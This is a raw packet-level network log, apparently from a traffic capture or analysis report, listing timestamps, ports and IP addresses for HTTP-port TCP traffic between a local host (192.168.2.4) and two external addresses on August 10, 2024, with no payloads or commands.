Aug 10, 2024 16:12:22.406471968 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.406500101 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.408031940 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.408046961 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.408087969 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.409471035 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.409487009 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.409538031 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.410909891 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.410923004 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.410980940 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.410980940 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.412506104 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.412519932 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.412533045 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.412549973 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.412578106 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.413521051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.413535118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.413600922 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.413630962 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.414474010 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.414489985 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.414544106 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.414576054 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.415406942 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.415421009 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.415676117 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.416380882 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.416395903 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.416430950 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.416460037 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.417294025 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.417309046 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.417324066 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.417336941 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.417367935 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.418375969 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.418390989 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.418437004 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.419137001 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.419152021 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.419203043 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.420136929 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.420150995 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.420181036 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.420207977 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.421019077 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.421035051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.421046972 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.421052933 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.421082020 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.421936989 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.421952009 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.421981096 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.422017097 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.422879934 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.422894955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.422940969 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.422971964 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.423811913 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.423825979 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.423863888 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.424747944 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.424763918 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.424803019 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.424849987 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.425669909 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.425685883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.425698042 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.425723076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.425770998 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.426630974 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.426646948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.426685095 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.427578926 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.427593946 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.427623034 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.427649975 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.428497076 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.428512096 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.428544044 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.428570986 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.429395914 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.429413080 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.429442883 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.429474115 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.430294991 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.430335045 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.430352926 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.430366993 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.430397987 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.430397987 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.431329966 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.431345940 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.431386948 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.432204962 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.432220936 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.432250977 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.432276964 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.433345079 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.433361053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.433391094 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.433417082 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.434154987 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.434170961 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.434185028 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.434190035 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.434220076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.435301065 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.435314894 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.435333014 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.435363054 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.435971022 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.435986042 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.436026096 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.436882019 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.436897993 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.436930895 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.436963081 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.437788010 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.437803984 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.437817097 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.437845945 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.437875032 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.478885889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.478943110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.479181051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.479198933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.479223967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.479233027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.479907036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.479954958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.480312109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.480326891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.480354071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.480364084 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.480995893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.481010914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.481039047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.481046915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.481889009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.481904984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.481934071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.481966972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.482819080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.482832909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.482851982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.482865095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.483048916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.483706951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.483721018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.483762026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.484565020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.484580040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.484637022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.484637022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.485564947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.485579967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.485610008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.485640049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.486174107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.486190081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.486232996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.486892939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.486907959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.486927032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.486970901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.486970901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.487704039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.487718105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.487772942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.487773895 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.488423109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.488436937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.488497972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.489022970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.489037991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.489049911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.489073038 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.489109039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.489850998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.489865065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.489923954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.489923954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.490524054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.490537882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.490567923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.490567923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.491192102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.491205931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.491236925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.491826057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.491842985 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.491856098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.491871119 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.491892099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.491902113 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.491919041 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.492742062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.492758036 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.492773056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.492796898 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.492831945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.493686914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.493700027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.493712902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.493727922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.493732929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.493762016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.493799925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.494627953 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.494645119 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.494657993 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.494678020 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.494707108 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.495599031 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.495613098 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.495625973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.495632887 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.495652914 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.495678902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.496516943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.496535063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.496555090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.496567965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.496594906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.496594906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.496632099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.497463942 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.497478962 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.497492075 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.497556925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.497558117 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.498392105 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.498408079 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.498420000 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.498433113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.498450994 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.498476982 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.498508930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.499355078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.499368906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.499382019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.499394894 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.499396086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.499432087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.499432087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.500268936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.500283957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.500298977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.500343084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.500343084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.501235962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.501251936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.501265049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.501286030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.501286030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.501302004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.502147913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.502161980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.502173901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.502188921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.502192974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.502254963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.502254963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.503160954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.503175020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.503225088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.503225088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.504142046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.504158020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.504215002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.504215002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.505422115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.505436897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.505716085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.506222010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.506237030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.506272078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.506362915 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.506896019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.506911039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.506922960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.506937027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.506944895 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.506963968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.507014990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.507945061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.507957935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.507971048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.507992029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.508017063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.508766890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.508781910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.508795023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.508825064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.508867025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.561114073 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561199903 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.561249018 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561309099 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561351061 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.561567068 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561619043 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.561731100 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561811924 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.561909914 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561920881 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.561952114 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.561979055 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.562339067 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.562398911 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.563281059 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.563328028 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.563425064 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.563446045 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.563474894 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.563500881 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.564081907 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.564096928 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.564110041 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.564129114 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.564156055 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.564903975 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.564919949 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.564939976 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.564975023 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.565006971 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.566231012 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.566246986 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.566260099 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.566277981 CEST	49741	80	192.168.2.4	185.215.113.16
